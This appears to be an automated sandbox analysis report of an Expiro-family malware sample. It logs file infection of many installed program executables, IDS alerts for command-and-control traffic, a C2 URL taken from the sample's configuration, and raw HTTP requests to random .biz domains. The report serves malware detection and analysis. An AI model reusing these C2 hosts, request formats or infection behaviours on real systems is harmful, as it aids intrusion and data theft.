Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\AppVClient.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\FXSSVC.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe System file written: C:\Windows\System32\alg.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02CF5908
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 7_2_00EF0207
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 7_2_00EF589A
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 7_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 7_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose, 7_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 7_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 7_2_00EE532E
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 15_2_00EF589A
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF0207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 15_2_00EF0207
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EF4EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 15_2_00EF4EC1
Source: C:\Users\Public\alpha.pif Code function: 15_2_00F03E66 FindFirstFileW,FindNextFileW,FindClose, 15_2_00F03E66
Source: C:\Users\Public\alpha.pif Code function: 15_2_00EE532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 15_2_00EE532E
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then jmp 02337394h 14_2_02337099
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then jmp 023378DCh 14_2_0233767B
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_02337E60
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_02337E5E
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h 14_2_02337FBC

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49753 -> 54.244.188.177:80
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:55012 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:52903 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:54094 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:54498 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:55974 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49867 -> 82.112.184.197:80
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50012 -> 18.141.10.107:80
Source: Network traffic Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:64255 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50077 -> 18.246.231.120:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://gxe0.com/yak2/233_Juqmtmyadyy
Queries random domain names (often used to prevent blacklisting and sinkholes)
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 63
Contains functionality to check if a connection to the internet is available
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0E4B8 InternetCheckConnectionA, 0_2_02D0E4B8
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.10:49774 -> 51.195.88.199:587
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49708 -> 198.252.105.91:443
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.10:49744
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.10:49757
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.10:49744
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.10:49757
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.10:49773
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.10:49773
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.10:50017
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.10:50017
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.10:50016
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.10:50018
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.10:50016
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.10:50018
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.10:50029
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.10:50029
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.10:50031
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.10:50031
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.10:50077
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.10:50077
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.10:50015
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.10:50015
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.10:50078
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.10:50086
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.10:50086
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.10:50078
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.2.10:49774 -> 51.195.88.199:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /omhtttbpfwdopn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic HTTP traffic detected: POST /ulvxycyjutwdmypq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic HTTP traffic detected: POST /nkbiquv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
